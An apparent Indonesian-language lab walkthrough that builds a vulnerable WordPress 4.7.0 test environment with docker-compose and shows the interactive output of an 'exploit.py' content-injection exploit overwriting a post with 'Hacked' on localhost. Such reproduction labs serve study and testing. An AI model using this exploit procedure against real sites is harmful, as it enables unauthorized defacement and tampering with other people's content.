Persiapan
Buatlah berkas docker-compose.yml untuk membangun docker.
version: '2'
services:
wordpress:
image: wordpress:4.7.0
ports:
- 8080:80
environment:
WORDPRESS_DB_PASSWORD: example
entrypoint:
- /bin/sh
- -c
- (sleep 5; echo "define('WP_AUTO_UPDATE_CORE', false);" >> /var/www/html/wp-config.php) & docker-entrypoint.sh apache2-foreground
mysql:
image: mariadb
environment:
MYSQL_ROOT_PASSWORD: example
Bangun Docker dengan perintah dibawah ini:
$ sudo docker-compose up --force-recreate; docker-compose down -v
Tunggu proses deployment sampai selesai, kemudian kunjungi alamat http://localhost:8080/. Kemudian instalasi Wordpress sebagaimana mestinya. Pada bagian wp-admin, atur Settings -> Permalink dan pilih Post Name.
Penyelesaian
Untuk eksploitasi gunakan berkas exploit.py dan jalankan sesuai pada luaran dibawah ini.
$ sudo python exploit.py
[X] WORDPRESS 4.7.0/4.7.1 CONTENT INJECTION EXPLOIT BY snoww0lf [X]
[x] Enter the URL: http://localhost:8080/
[?] Please wait ...
[x] Wordpress Version: 4.7
[x] It's affected version. It seems vulnerable, continue? [y/n] y
[x] Parsing data information, please wait ...
[x] Post ID: 1
[x] Post Title: Hello world!
[x] Post URL: http://localhost:8080/hello-world/
[x] Post Content: <p>Welcome to WordPress. This is your first post. Edit or delete it, then start writing!</p>
[SNIPPET]
[x] Enter ID Content that you want to overwrite: 1
[x] Change title: Hacked
=> 1. Load data from file.
=> 2. Input data.
[x] Change content by [1/2] ? 2
[?] Input data: hacked
[x] Exploit in progress ...
[x] Update success!
[?] Continue ? [y/n] n
Ini dia hasilnya.
Referensi